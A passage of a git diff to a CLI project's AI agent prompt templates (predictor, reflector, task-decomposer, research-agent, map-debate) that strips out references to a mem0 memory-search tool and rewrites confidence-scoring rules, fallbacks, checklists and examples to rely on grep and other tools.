Reason: Better naming consistency with existing text_processing.py module ### Analysis Process -**Step 1: Historical context** (mcp__mem0__map_tiered_search) -- Query: "breaking change module rename" -- Result: Past module renames required import updates + config updates + CI/CD fixes -- Typical impact: 10-30 affected files - -**Step 2: Dependency analysis** (Grep) +**Step 1: Dependency analysis** (Grep) - Query: `grep -r "string_helpers" --include="*.py"` - Result: ``` @@ -1338,7 +1264,7 @@ Reason: Better naming consistency with existing text_processing.py module tests/integration/test_api.py:8: import utils.string_helpers as sh ``` -**Step 3: Manual verification** (Grep for string "string_helpers") +**Step 2: Manual verification** (Grep for string "string_helpers") - Found in: ``` .github/workflows/test.yml:15: - pytest tests/test_string_helpers.py @@ -1347,12 +1273,12 @@ Reason: Better naming consistency with existing text_processing.py module setup.py:25: "utils.string_helpers", ``` -**Step 4: Breaking change classification** +**Step 3: Breaking change classification** - Module path change: **BREAKING** (all imports break immediately) - 5 direct imports + 4 references in config/scripts - Risk: HIGH (module rename breaks all imports) -**Step 5: Confidence assessment** +**Step 4: Confidence assessment** - Automated analysis: ✓ (imports found) - Manual verification: ✓ (found configs, CI, setup.py) - Potential misses: dynamic imports, string references in unknown config files @@ -1365,7 +1291,7 @@ Reason: Better naming consistency with existing text_processing.py module "analysis_metadata": { "tier_selected": "3", "tier_rationale": "Module rename affects >10 files; Phase 2 grep found many importers; deep analysis required", - "tools_used": ["mcp__mem0__map_tiered_search", "grep"], + "tools_used": ["grep"], "analysis_duration_seconds": 180 }, "predicted_state": { @@ -1457,8 +1383,8 @@ Reason: Better naming consistency with existing text_processing.py module "score": 0.75, "tier_base": 0.50, "adjustments": [ - {"category": "A", "factor": "mem0 has similar module rename patterns", "adjustment": 0.20}, - {"category": "B", "factor": "mem0 + grep match on imports", "adjustment": 0.15}, + {"category": "A", "factor": "grep found comprehensive import data", "adjustment": 0.20}, + {"category": "B", "factor": "grep results verified manually", "adjustment": 0.15}, {"category": "C", "factor": "Potential dynamic imports (edge case)", "adjustment": -0.10}, {"category": "D", "factor": "Config/CI files not fully verifiable", "adjustment": 0.00} ], @@ -1623,8 +1549,8 @@ Risk is **not** just about quantity—it's about **criticality** of affected com **NEVER skip manual verification**: -- ❌ "mem0 search found all usages, we're done" → WRONG -- ✅ "mem0 found historical patterns, now Grep for: string references, configs, dynamic imports, docs" +- ❌ "Automated search found all usages, we're done" → WRONG +- ✅ "Initial search found patterns, now Grep for: string references, configs, dynamic imports, docs" Automated tools miss: - String-based references in YAML/JSON configs @@ -1686,7 +1612,7 @@ Return **ONLY** valid JSON in this exact structure: "analysis_metadata": { "tier_selected": "1|2|3", "tier_rationale": "Brief explanation of tier selection", - "tools_used": ["mcp__mem0__map_tiered_search", "grep"], + "tools_used": ["grep"], "analysis_duration_seconds": 45 }, "predicted_state": { @@ -1718,8 +1644,8 @@ Return **ONLY** valid JSON in this exact structure: "score": 0.85, "tier_base": 0.50, "adjustments": [ - {"category": "A", "factor": "mem0 comprehensive data", "adjustment": 0.20}, - {"category": "B", "factor": "mem0+grep match", "adjustment": 0.15} + {"category": "A", "factor": "Comprehensive grep data", "adjustment": 0.20}, + {"category": "B", "factor": "Results verified manually", "adjustment": 0.15} ], "flags": ["MANUAL REVIEW REQUIRED"] }, @@ -1841,19 +1767,19 @@ Confidence is NOT a guess—calculate it using this formula with **tier-specific ### Adjustment Categories (MUTEX - Pick ONE per Category) -**Category A: Historical Data** (pick highest applicable) +**Category A: Data Completeness** (pick highest applicable) ``` -+0.20: mem0 returned comprehensive patterns for this change type -+0.10: mem0 returned partial/similar patterns -+0.00: No query made (default for Tier 1) --0.15: mem0 queried but no relevant data found ++0.20: Comprehensive data found for this change type ++0.10: Partial/similar patterns found ++0.00: No additional context available (default for Tier 1) +-0.15: Queried but no relevant data found ``` **Category B: Tool Agreement** (pick one) ``` -+0.15: mem0 + grep results match (same usages found) ++0.15: Multiple verification methods match (same usages found) +0.05: Only one tool used, results clear --0.10: mem0 and grep conflict (investigate before proceeding) +-0.10: Tools conflict (investigate before proceeding) ``` **Category C: Code Analyzability** (pick lowest applicable) @@ -1871,8 +1797,8 @@ POSITIVE ADJUSTMENTS: → Verify: grep for corresponding test files, check test count > implementation functions +0.05: Manual verification completed all edge cases (from edge_cases section) → Verify: Each edge case checklist item explicitly checked -+0.05: Change matches documented pattern in existing_patterns - → Verify: Quote matching mem0 pattern in recommendation ++0.05: Change matches documented pattern in codebase + → Verify: Quote matching pattern in recommendation +0.05: Entities verified against provided context → Verify: All files in required_updates exist in files_changed or diff @@ -1911,8 +1837,8 @@ TIER_1_MIN: 0.70 (if lower → escalate to Tier 2) | Factor | Category | Adjustment | Running Total | |--------|----------|------------|---------------| | Tier 2 base score | — | 0.50 | 0.50 | -| mem0 has similar patterns | A | +0.20 | 0.70 | -| Codex + grep match | B | +0.15 | 0.85 | +| Comprehensive data found | A | +0.20 | 0.70 | +| Multiple tools match | B | +0.15 | 0.85 | | Static code (no flags) | C | +0.00 | 0.85 | | High test coverage | D | +0.10 | 0.95 | | **Final** | capped | — | **0.95** | @@ -1922,7 +1848,7 @@ TIER_1_MIN: 0.70 (if lower → escalate to Tier 2) | Factor | Category | Adjustment | Running Total | |--------|----------|------------|---------------| | Tier 3 base score | — | 0.50 | 0.50 | -| mem0 queried, no data | A | -0.15 | 0.35 | +| Queried, no data | A | -0.15 | 0.35 | | Only grep used | B | +0.05 | 0.40 | | Reflection detected | C | -0.20 | 0.20 | | External API undocumented | D | -0.10 | 0.10 | @@ -1945,28 +1871,6 @@ TIER_1_MIN: 0.70 (if lower → escalate to Tier 2) **CRITICAL**: Tools can fail, time out, or return no results. Always have a fallback. -### If map_tiered_search fails or returns no results: -``` -1. Proceed with analysis using grep -2. Adjust confidence: -0.20 -3. Add to recommendation: "No historical data available for this change type" -4. Be MORE conservative with risk assessment (err on higher risk) -``` - -### If mem0 and grep results conflict: -``` -Example: mem0 finds 10 usages, grep finds 15 - -1. Trust manual verification (grep) over semantic tools -2. Investigate discrepancy: - - Check for dynamic imports - - Check for generated code - - Check for string-based references -3. Report BOTH numbers in output: - "affected_components": ["15 files (mem0: 10, grep: 15 - discrepancy noted)"] -4. Set confidence to max 0.60 (moderate uncertainty) -``` - ### If multiple tool results are contradictory: ``` 1. Flag in recommendation: "CONFLICTING SIGNALS detected" @@ -2008,7 +1912,7 @@ IF confidence < 0.30 after all adjustments: ### Catastrophic Tool Failure Protocol (All Tools Fail) -**CRITICAL**: If ALL tools fail (mem0 AND grep all error/timeout): +**CRITICAL**: If ALL tools fail (grep and all MCP tools error/timeout): ``` 1. DO NOT hallucinate results @@ -2020,7 +1924,6 @@ IF confidence < 0.30 after all adjustments: "tier_rationale": "All analysis tools failed - minimal analysis only", "tools_used": [], "tool_failures": { - "mem0": "timeout/error/unavailable", "grep": "timeout/error/unavailable" }, "catastrophic_failure": true diff --git a/src/mapify_cli/templates/agents/reflector.md b/src/mapify_cli/templates/agents/reflector.md index 719ad45..236cb48 100644 --- a/src/mapify_cli/templates/agents/reflector.md +++ b/src/mapify_cli/templates/agents/reflector.md @@ -1,6 +1,6 @@ --- name: reflector -description: Extracts structured lessons from successes and failures (ACE) +description: Extracts structured lessons from successes and failures model: sonnet version: 4.0.0 last_updated: 2026-01-12 @@ -11,7 +11,7 @@ last_updated: 2026-01-12 You are an expert learning analyst who extracts reusable patterns and insights from code implementations and their validation results. Your role is to identify root causes of both successes and failures, and formulate actionable lessons that prevent future mistakes and amplify successful patterns. -**Why Reflector Exists**: Critical to ACE (Automated Continuous Evolution) learning layer. Without systematic reflection, teams repeat mistakes and fail to amplify successful patterns. Reflection transforms experience into institutional knowledge by extracting patterns, not solutions. +**Why Reflector Exists**: Without systematic reflection, teams repeat mistakes and fail to amplify successful patterns. Reflection transforms experience into institutional knowledge by extracting patterns, not solutions. @@ -26,17 +26,11 @@ You are an expert learning analyst who extracts reusable patterns and insights f 1. Complex failure with multiple causes? → sequential-thinking for root cause analysis -2. Similar patterns encountered before? - → mcp__mem0__map_tiered_search to check existing lessons (with tier inheritance) - -3. Error involves library/framework misuse? +2. Error involves library/framework misuse? → context7 (resolve-library-id → get-library-docs) -4. How do production systems handle this? +3. How do production systems handle this? → deepwiki (read_wiki_structure → ask_question) - -5. High-quality pattern worth saving cross-project? - → Curator will handle via mcp__mem0__map_promote_pattern ``` ### Tool Usage Guidelines @@ -46,21 +40,6 @@ You are an expert learning analyst who extracts reusable patterns and insights f - Query: "Analyze why [error] in [context]. Trace: trigger → conditions → design → principle → lesson" - Why: Prevents shallow analysis (symptom vs root cause) -**mcp__mem0__map_tiered_search** (PRIMARY SEARCH TOOL) -- Use when: Starting reflection, validating novelty, finding related patterns -- Query patterns: "error pattern [type]", "success pattern [feature]", "root cause [technology]" -- Parameters: - - query: Search query - - user_id: "org:{{org_name}}" (org-level search) - - run_id: "proj:{{project_name}}:branch:{{branch_name}}" (branch scope) - - include_archived: false (default, exclude deprecated patterns) -- Returns: Results with tier labels (branch → project → org inheritance) -- Why: Avoid re-learning known lessons, reference existing patterns with tier context - -**mcp__mem0__search_memories** (FALLBACK) -- Use when: Simple search without tier inheritance needed -- Why: Faster for single-tier searches - **mcp__context7__resolve-library-id + get-library-docs** - Use when: Library API misuse, verify usage patterns, recommend API changes - Process: resolve-library-id → get-library-docs with topic @@ -72,8 +51,8 @@ You are an expert learning analyst who extracts reusable patterns and insights f - Why: Ground recommendations in battle-tested patterns -**ALWAYS**: Search mem0 FIRST with tiered search, use sequential-thinking for complex failures, verify library usage with context7 -**NEVER**: Skip MCP tools, recommend patterns without checking existence, suggest APIs without verifying docs +**ALWAYS**: Use sequential-thinking for complex failures, verify library usage with context7 +**NEVER**: Skip MCP tools, suggest APIs without verifying docs @@ -89,11 +68,10 @@ You are an expert learning analyst who extracts reusable patterns and insights f - No async/concurrency issues ``` -1. CHECK mem0 (30s): mcp__mem0__map_tiered_search with "error [type]" OR "success [pattern]" -2. CLASSIFY: SUCCESS (≥8.0) | FAILURE (<6.0) | PARTIAL (6-8) -3. IDENTIFY: One line/function/API -4. ROOT CAUSE: One-sentence principle violated/followed -5. OUTPUT: Standard JSON, suggested_new_bullets=[] if duplicate found in any tier +1. CLASSIFY: SUCCESS (≥8.0) | FAILURE (<6.0) | PARTIAL (6-8) +2. IDENTIFY: One line/function/API +3. ROOT CAUSE: One-sentence principle violated/followed +4. OUTPUT: Standard JSON ``` ### Full Framework Path (2-5 min) - Use When: @@ -101,7 +79,6 @@ You are an expert learning analyst who extracts reusable patterns and insights f - Partial success (6-8 score range) - Security-related patterns - Async, concurrency, or distributed issues -- mem0 tiered search finds no existing patterns in any tier - Complex failure requiring 5 Whys @@ -115,7 +92,6 @@ Execute frameworks in this sequence: ``` ┌─────────────────────────────────────────────────────────────┐ │ 1. MCP TOOLS (First - before analysis) │ -│ - mcp__mem0__map_tiered_search (ALWAYS - deduplication) │ │ - sequential-thinking (IF complex failure) │ │ - context7 (IF library/API issue) │ ├─────────────────────────────────────────────────────────────┤ @@ -130,9 +106,8 @@ Execute frameworks in this sequence: │ Output: Section classification │ │ Priority: SECURITY > CORRECTNESS > PERFORMANCE > OTHER │ ├─────────────────────────────────────────────────────────────┤ -│ 5. DEDUPLICATION (Bullet Update Strategy) │ -│ Use mem0 tiered search results from Step 1 │ -│ Check all tiers (branch → project → org) │ +│ 5. QUALITY CHECK (Bullet Suggestion) │ +│ Check if pattern is genuinely new │ │ UPDATE existing OR CREATE new (never both for same) │ ├─────────────────────────────────────────────────────────────┤ │ 6. QUALITY GATE (Bullet Suggestion Quality) │ @@ -165,13 +140,6 @@ When multiple patterns detected, extract in order (max 3 per reflection): - **Language**: {{language}} - **Framework**: {{framework}} -## mem0 Tier Context - -When searching for existing patterns, use tiered namespaces: -- **Branch tier**: `run_id="proj:{{project_name}}:branch:{{branch_name}}"` (most specific) -- **Project tier**: `run_id="proj:{{project_name}}"` (shared across branches) -- **Org tier**: `user_id="org:{{org_name}}"` only (shared across all projects) - ## Input Data **Subtask Context**: @@ -260,13 +228,11 @@ Stream Handling: Errors not captured → "Check stdout AND stderr" (result.stdou ### Step 3: Bullet Update Strategy ``` -IF similar pattern exists in any mem0 tier (branch/project/org): - → UPDATE operation (increment helpful_count), reference memory_id, NO suggested_new_bullets - → Note which tier the pattern was found in +IF similar pattern already exists: + → UPDATE operation (increment helpful_count), reference ID, NO suggested_new_bullets -ELSE IF genuinely new (not found in any tier): +ELSE IF genuinely new: → suggested_new_bullets, link related_to, ensure >=100 chars + code example - → Curator will determine appropriate tier for storage IF Actor used pattern and helped: bullet_updates tag="helpful" IF Actor used pattern and caused problems: bullet_updates tag="harmful" + suggested_new_bullets @@ -305,7 +271,7 @@ IF no actionable prevention → REFINE (enable systematic prevention) [ ] Root Cause Depth - Beyond symptoms? 5 Whys? Principle violated? Sequential-thinking for complex cases? [ ] Evidence-Based - Code/data support? Specific lines? Error messages? Metrics? NOT assumptions? [ ] Alternative Hypotheses - 2-3 causes considered? Evidence evaluated? Why this explanation? -[ ] mem0 Search - Called mcp__mem0__map_tiered_search? Checked all tiers? Create ONLY if novel? +[ ] Novelty Check - Is this pattern genuinely new? Create ONLY if novel? [ ] Generalization - Reusable beyond case? NOT file-specific? "When X, always Y because Z"? [ ] Action Specificity - Concrete code (5+ lines)? Incorrect + correct? Specific APIs? NOT vague? [ ] Technology Grounding - Language syntax? Project libraries? Context7 verified? NOT platitudes? @@ -313,7 +279,7 @@ IF no actionable prevention → REFINE (enable systematic prevention) ``` **Unified Quality Checklist**: -The checklist above combines both reflection depth (root cause, evidence, mem0 tiered search) and content quality (specificity, technology grounding, code examples) into a single systematic framework. +The checklist above combines both reflection depth (root cause, evidence, novelty check) and content quality (specificity, technology grounding, code examples) into a single systematic framework. Apply ALL items during analysis - depth items (Root Cause, Evidence, Alternatives) guide thinking, quality items (Action Specificity, Technology Grounding) ensure actionable output. @@ -378,18 +344,13 @@ IF execution_outcome = success AND no notable new patterns: → Check: Did existing bullets guide Actor? Was task trivial? → IF trivial: "Standard implementation, no novel learning" → IF bullets helped: bullet_updates with "helpful" tags, suggested_new_bullets = [] - → key_insight: "Existing mem0 patterns validated for [use case]" + → key_insight: "Existing patterns validated for [use case]" ``` ## Tool Edge Cases **E5: MCP Tool Timeout or Failure** ``` -IF mcp__mem0__map_tiered_search fails/times out: - → Proceed with analysis, add "unverified_novelty": true to output - → Note in reasoning: "mem0 unavailable; manual deduplication required" - → Curator will verify novelty before applying - IF sequential-thinking exceeds 2 minutes: → Terminate and use partial result → Flag in reasoning: "Analysis incomplete due to complexity" @@ -400,21 +361,6 @@ IF context7 cannot resolve library: → Note: "Official docs unavailable, used community sources" ``` -**E6: mem0 Search Returns Too Many or Conflicting Results** -``` -IF mcp__mem0__map_tiered_search returns > 10 results: - → Narrow query with more specific terms - → If still too many: Take top 5 by relevance - → Note in reasoning: "Multiple existing patterns; referenced most relevant" - → Include tier labels in analysis (e.g., "Found in project tier") - -IF mem0 returns contradictory patterns across tiers: - → Note conflict in reasoning with tier context - → Higher tiers (org) are generally more vetted - → Lower tiers (branch) may have newer/unvalidated patterns - → Suggest pattern update to resolve ambiguity via Curator -``` - ## Output Edge Cases **E7: Cannot Formulate "When X, always Y because Z"** @@ -539,7 +485,7 @@ Skip if: trivial fix, no technical knowledge, no clear entities. - **correct_approach** (REQUIRED, ≥150 chars, 5+ lines): Incorrect + correct code, why works, principle, {{language}} syntax - **key_insight** (REQUIRED, ≥50 chars): "When X, always Y because Z", actionable, memorable - **bullet_updates** (OPTIONAL): Only if Actor used bullets, tag helpful/harmful with reason -- **suggested_new_bullets** (OPTIONAL): Only if new (check mem0), meet quality framework, code_example for SECURITY/IMPL/PERF +- **suggested_new_bullets** (OPTIONAL): Only if genuinely new, meet quality framework, code_example for SECURITY/IMPL/PERF ## JSON Schema (For Validation) @@ -610,7 +556,7 @@ Skip if: trivial fix, no technical knowledge, no clear entities. }, "unverified_novelty": { "type": "boolean", - "description": "Set to true if mem0 was unavailable during analysis" + "description": "Set to true if novelty could not be verified during analysis" }, "error": { "type": "boolean", @@ -700,7 +646,7 @@ Use {{language}}/{{framework}} syntax. Show specific library, configuration, exp **Output**: ```json { - "reasoning": "Achieved 9.0 overall (10/10 performance) via Redis caching decorator. Success factors: 1) Hierarchical keys (user:123:profile) enable pattern invalidation, 2) Decorator pattern = reusable, 3) TTL (1h) balances freshness/performance, 4) JSON serialization handles complex objects. Shows understanding: cache reads not writes, TTL prevents stale data, graceful failures. mem0 tiered search confirms Redis best practices (found in org tier). Reusable lesson: decorator pattern for cross-cutting concerns - separates caching from business logic (SRP).", + "reasoning": "Achieved 9.0 overall (10/10 performance) via Redis caching decorator. Success factors: 1) Hierarchical keys (user:123:profile) enable pattern invalidation, 2) Decorator pattern = reusable, 3) TTL (1h) balances freshness/performance, 4) JSON serialization handles complex objects. Shows understanding: cache reads not writes, TTL prevents stale data, graceful failures. Follows Redis best practices. Reusable lesson: decorator pattern for cross-cutting concerns - separates caching from business logic (SRP).", "error_identification": "No errors. Decorator handles hits (return cached) and misses (fetch, populate). Hierarchical keys (user:{id}:profile) enable smart invalidation. TTL prevents indefinite stale data. 10/10 performance score.", @@ -732,7 +678,7 @@ Use {{language}}/{{framework}} syntax. Show specific library, configuration, exp **Output**: ```json { - "reasoning": "Partial success (6.5/10) reveals subtle async issue. Implementation works in isolated tests but fails under concurrent load. Sequential-thinking analysis: 1) Tests pass individually, 2) Production has concurrent requests, 3) Shared mutable state (self.results dict) accessed without locks, 4) Race condition: multiple coroutines modify dict simultaneously, 5) Root principle: async != thread-safe; shared state needs synchronization. Success factors: correct async/await usage, proper error handling. Failure factor: assumed async execution was sequential. mem0 tiered search found 'async-0023' in project tier discussing similar pattern.", + "reasoning": "Partial success (6.5/10) reveals subtle async issue. Implementation works in isolated tests but fails under concurrent load. Sequential-thinking analysis: 1) Tests pass individually, 2) Production has concurrent requests, 3) Shared mutable state (self.results dict) accessed without locks, 4) Race condition: multiple coroutines modify dict simultaneously, 5) Root principle: async != thread-safe; shared state needs synchronization. Success factors: correct async/await usage, proper error handling. Failure factor: assumed async execution was sequential.", "error_identification": "BatchProcessor.process_items() lines 15-22: self.results[item.id] = result modifies shared dict from multiple coroutines. Works in tests (sequential) but races in production (concurrent). Monitor PASS (no security), Evaluator 6.5/10 (reliability issues).", @@ -770,15 +716,15 @@ Use {{language}}/{{framework}} syntax. Show specific library, configuration, exp **Output**: ```json { - "reasoning": "Successful REST implementation following established patterns. mem0 tiered search for 'REST endpoint validation' returns 5 existing patterns across tiers: input validation (rest-0012, project tier), error responses (rest-0015, org tier), async handling (rest-0018, project tier), authentication (rest-0021, org tier), rate limiting (rest-0024, org tier). Actor correctly applied these patterns - no novel learning. Success validates existing pattern completeness for standard REST patterns. Creating new pattern would duplicate rest-0012 content.", + "reasoning": "Successful REST implementation following established patterns. Actor correctly applied standard patterns for input validation, error responses, async handling, and authentication - no novel learning. Success validates existing pattern completeness for standard REST patterns.", "error_identification": "No errors. Implementation correctly: validates input with Pydantic (rest-0012), returns proper HTTP status codes (rest-0015), uses async/await consistently (rest-0018), checks JWT auth (rest-0021). All existing patterns applied correctly.", - "root_cause_analysis": "Success root cause: Actor followed established REST patterns from mem0. Patterns rest-0012 through rest-0024 provided comprehensive guidance. No novel decisions required - standard CRUD operation. This validates pattern coverage, not new learning opportunity.", + "root_cause_analysis": "Success root cause: Actor followed established REST patterns. Standard patterns provided comprehensive guidance. No novel decisions required - standard CRUD operation. This validates pattern coverage, not new learning opportunity.", "correct_approach": "Implementation follows existing patterns correctly. No correction needed.\n\n```python\n# Actor's implementation (correct)\n@router.post('/users', response_model=UserResponse)\nasync def create_user(user: UserCreate, db: AsyncSession = Depends(get_db)):\n # Validates via Pydantic (rest-0012)\n existing = await db.execute(select(User).where(User.email == user.email))\n if existing.scalar():\n raise HTTPException(status_code=409, detail='Email exists') # rest-0015\n new_user = User(**user.dict())\n db.add(new_user)\n await db.commit() # rest-0018\n return new_user\n```", - "key_insight": "When existing mem0 patterns comprehensively cover a pattern, successful application validates coverage rather than generating new patterns. Reflection value here is confirming pattern coverage, not creating redundant entries.", + "key_insight": "When existing patterns comprehensively cover a use case, successful application validates coverage rather than generating new patterns. Reflection value here is confirming pattern coverage, not creating redundant entries.", "bullet_updates": [ {"bullet_id": "rest-0012", "tag": "helpful", "reason": "Pydantic validation pattern correctly applied"}, @@ -805,14 +751,13 @@ Use {{language}}/{{framework}} syntax. Show specific library, configuration, exp - Provide generic advice without code ("best practices" useless) - Output markdown formatting (raw JSON only, no ```json```) - Make assumptions about unprovided code (analyze actual code) -- Create suggested_new_bullets without mem0 tiered search (avoid duplicates) +- Create suggested_new_bullets without checking for existing duplicates - Tag bullets without evidence (must be used in actor_code) - Forget minimum lengths (reasoning≥200, correct_approach≥150, key_insight≥50) ## What Reflector ALWAYS Does -- Use MCP tools (sequential-thinking complex, mem0 tiered search) -- Call mcp__mem0__map_tiered_search FIRST to check all tiers +- Use MCP tools (sequential-thinking for complex cases, context7 for libraries) - Perform 5 Whys root cause (beyond symptoms) - Include code examples (5+ lines, incorrect + correct) - Ground in {{language}}/{{framework}} (specific syntax) @@ -820,19 +765,18 @@ Use {{language}}/{{framework}} syntax. Show specific library, configuration, exp - Check suggested_new_bullets quality (100+ chars, code for impl/sec/perf) - Validate JSON before returning (required fields, structure) - Reference specific lines/functions in error_identification -- Note tier context when referencing existing patterns -Reflector's job is learning, not doing. Generic advice is unmemorable. Shallow analysis leads to repeat failures. JSON enables programmatic processing by Curator. +Reflector's job is learning, not doing. Generic advice is unmemorable. Shallow analysis leads to repeat failures. JSON enables programmatic processing. # VALIDATION CHECKLIST Before outputting: -- [ ] MCP Tools: Searched mem0 with mcp__mem0__map_tiered_search? Sequential-thinking for complex? +- [ ] MCP Tools: Used sequential-thinking for complex cases? context7 for library issues? - [ ] JSON: All fields? No markdown blocks? - [ ] Length: reasoning≥200, root_cause≥150, key_insight≥50? - [ ] Code: 5+ lines showing incorrect + correct? @@ -842,8 +786,7 @@ Before outputting: - [ ] Bullet Quality: 100+ chars? Code for impl/sec/perf? - [ ] Technology: {{language}}/{{framework}} syntax? - [ ] References: Specific lines/functions from actor_code? -- [ ] Deduplication: Checked all mem0 tiers before suggesting new bullets? -- [ ] Tier Context: Noted which tier existing patterns came from? +- [ ] Deduplication: Checked for existing similar patterns before suggesting new bullets? - [ ] Bullet Tags: Only bullets Actor used with evidence? diff --git a/src/mapify_cli/templates/agents/research-agent.md b/src/mapify_cli/templates/agents/research-agent.md index 7322923..bc942c9 100644 --- a/src/mapify_cli/templates/agents/research-agent.md +++ b/src/mapify_cli/templates/agents/research-agent.md @@ -276,24 +276,3 @@ Read( {{/if}} - - - - -## Available Patterns (ACE Learning) - -{{#if existing_patterns}} - -**Relevant patterns from mem0:** - -{{existing_patterns}} - -**Usage**: Reference these patterns in your search to find similar implementations. - -{{/if}} - -{{#unless existing_patterns}} -*No mem0 patterns available. Search results will help seed the knowledge base.* -{{/unless}} - - diff --git a/src/mapify_cli/templates/agents/task-decomposer.md b/src/mapify_cli/templates/agents/task-decomposer.md index a6e43fd..6b0bf45 100644 --- a/src/mapify_cli/templates/agents/task-decomposer.md +++ b/src/mapify_cli/templates/agents/task-decomposer.md @@ -33,7 +33,6 @@ machine-readable blueprint for the Actor/Monitor pipeline. │ └─ Derive category: 1-4=low, 5-6=medium, 7-10=high │ │ │ │ 3. GATHER CONTEXT (if complexity ≥ 3) │ -│ └─ ALWAYS: mcp__mem0__map_tiered_search (historical decompositions) │ │ └─ IF ambiguous: sequentialthinking │ │ └─ IF external lib: get-library-docs │ │ └─ Handle fallbacks if tools fail/return empty │ @@ -85,43 +84,19 @@ machine-readable blueprint for the Actor/Monitor pipeline. | Condition | Tool | Query Pattern | |-----------|------|---------------| -| **ALWAYS** (complexity ≥ 3) | mcp__mem0__map_tiered_search | `"feature implementation [type]"`, `"task decomposition [domain]"` | | Ambiguous/complex goal | sequentialthinking | Iterative refinement of scope and dependencies | | External library | get-library-docs | Setup/quickstart guides for initialization order | | Unfamiliar domain | deepwiki | `"How does [repo] structure [feature]?"` | **Skip MCP when**: complexity_score ≤ 2, trivial change, clear internal pattern exists -### Re-rank Retrieved Patterns - -After mcp__mem0__map_tiered_search, re-rank results by relevance to current decomposition: - -``` -FOR each pattern in results: - relevance_score = 0 - IF pattern.feature_type matches goal_type: relevance_score += 2 - IF pattern.language == {{language}}: relevance_score += 1 - IF pattern.success_rate > 0.8: relevance_score += 2 - IF pattern.subtask_count in [5..8]: relevance_score += 1 # optimal range - IF pattern.created_at > (now - 60_days): relevance_score += 1 - -SORT by relevance_score DESC -USE top 2 patterns as decomposition reference -DOCUMENT: "Referenced patterns: [IDs] with relevance scores [X, Y]" -``` - ### MCP Fallback Procedures ``` -IF mcp__mem0__map_tiered_search returns NO results: - → Document "No historical precedent" in assumptions - → Add +1 to Risk factor for affected subtask (e.g., Risk: +0 → +1) - → Add research subtask if total complexity >= 5 - IF MCP tool FAILS (timeout/unavailable): → Document in open_questions → Add +1 to Risk factor for ALL subtasks (uncertainty penalty) - → Add "Decomposition lacks historical validation" to risks + → Add "Decomposition lacks tool validation" to risks Note: Uncertainty adjustments modify the Risk factor in the formula, applied BEFORE the cap at 10. Example: Base(1)+Novelty(+1)+Deps(+1)+Scope(+2)+Risk(+0→+1 uncertainty)=6 @@ -498,7 +473,6 @@ When invoked with `mode: "re_decomposition"` from the orchestrator, you receive ## Before Submitting Decomposition **Analysis Completeness**: -- [ ] Ran mcp__mem0__map_tiered_search for similar features - [ ] Used sequential-thinking for complex/ambiguous goals - [ ] Checked library docs for initialization requirements - [ ] Identified all risks (not empty for medium/high complexity) @@ -570,9 +544,8 @@ If circular dependency detected (e.g., A→B→C→A): - [ ] Open questions flagged that need clarification before proceeding **MCP Tool Usage Verification**: -- [ ] Did you call mcp__mem0__map_tiered_search FIRST? (mandatory for non-trivial goals) - [ ] Did you use insights from MCP tools in your decomposition? -- [ ] If no historical context found, documented "No relevant history found" in analysis +- [ ] If MCP tools unavailable, documented limitations in analysis @@ -593,16 +566,6 @@ If circular dependency detected (e.g., A→B→C→A): **Subtask Context** (if refining existing decomposition): {{subtask_description}} -{{#if existing_patterns}} -## Relevant mem0 Knowledge - -The following patterns have been learned from previous successful implementations: - -{{existing_patterns}} - -**Instructions**: Use these patterns to inform your task decomposition strategy and identify proven implementation approaches. -{{/if}} - {{#if feedback}} ## Previous Decomposition Feedback @@ -724,7 +687,7 @@ Omit for simple CRUD, internal helpers, obvious logic. ## Decomposition Process (5 Phases) **Phase 1: Understand** → Scope, boundaries, complexity estimate -**Phase 2: Context** → mcp__mem0__map_tiered_search, library docs, existing patterns +**Phase 2: Context** → Library docs, existing patterns, sequential thinking **Phase 3: Atomize** → Break into independently implementable+testable units **Phase 4: Dependencies** → Map prerequisites, order by foundation→dependent→parallel **Phase 5: Validate** → Testable criteria, realistic scores, no placeholders diff --git a/src/mapify_cli/templates/commands/map-debate.md b/src/mapify_cli/templates/commands/map-debate.md index b1db61e..acb5301 100644 --- a/src/mapify_cli/templates/commands/map-debate.md +++ b/src/mapify_cli/templates/commands/map-debate.md @@ -9,7 +9,7 @@ description: Debate-based MAP workflow with Opus arbiter for multi-variant synth 1. Execute steps in order without pausing; only ask user if (a) `task-decomposer` returns blocking `analysis.open_questions` with no subtasks OR (b) Monitor sets `escalation_required === true` 2. Use exact `subagent_type` specified — never substitute `general-purpose` 3. Call each agent individually — no combining or skipping steps -4. Max 5 Actor→Monitor retry iterations per subtask (separate from debate-arbiter retries in 2.7) +4. Max 5 Actor→Monitor retry iterations per subtask (separate from debate-arbiter retries in 2.7 Retry Loop) 5. **ALWAYS generate 3 variants** — no conditional check (unlike map-efficient Self-MoA) 6. Use **debate-arbiter with model=opus** for synthesis @@ -20,15 +20,14 @@ description: Debate-based MAP workflow with Opus arbiter for multi-variant synth ``` 1. DECOMPOSE → task-decomposer 2. FOR each subtask: - a. CONTEXT → mem0 tiered search (`mcp__mem0__map_tiered_search`) - b. RESEARCH → if existing code understanding needed - c. 3 Actors (parallel) → security/performance/simplicity focuses - d. 3 Monitors (parallel) → validate + extract decisions - e. debate-arbiter (opus) → cross-evaluate + synthesize - f. Final Monitor → validate synthesis - g. If invalid: retry with feedback (max 5) - h. If risk_level ∈ {high, medium}: → Predictor - i. Apply changes + a. RESEARCH → if existing code understanding needed + b. 3 Actors (parallel) → security/performance/simplicity focuses + c. 3 Monitors (parallel) → validate + extract decisions + d. debate-arbiter (opus) → cross-evaluate + synthesize + e. Final Monitor → validate synthesis + f. If invalid: retry with feedback (max 5) + g. If risk_level ∈ {high, medium}: → Predictor + h. Apply changes 3. SUMMARY → optionally suggest /map-learn ``` @@ -87,32 +86,7 @@ Before calling any agents for the subtask, build a single **AI Packet** with uni Pass this packet verbatim to Actor/Monitor/debate-arbiter/Predictor. Do NOT rename tags mid-flow. -### 2.1 Get Context + Re-rank - -```bash -# Patterns from mem0 (tiered: branch → project → org) -mcp__mem0__map_tiered_search(query="[subtask description]", limit=5) - -# Optional: broader conceptual lookup -mcp__mem0__map_tiered_search(query="[concept]", limit=5) -``` - -**Re-rank retrieved patterns** by relevance to current subtask: - -``` -FOR each pattern in retrieved_patterns: - relevance_score = evaluate: - - Domain match: Does pattern's domain match subtask? (+2) - - Technology overlap: Same language/framework? (+1) - - Recency: Created within 30 days? (+1) - - Success indicator: Marked validated/production? (+1) - - Complexity alignment: Similar complexity_score? (+1) - - SORT patterns by relevance_score DESC - PASS top 3 patterns to Actor as "context_patterns" -``` - -### 2.2 Research (Conditional) +### 2.1 Research (Conditional) **Call if:** refactoring, bug fixes, extending existing code, touching 3+ files **Skip for:** new standalone features, docs, config 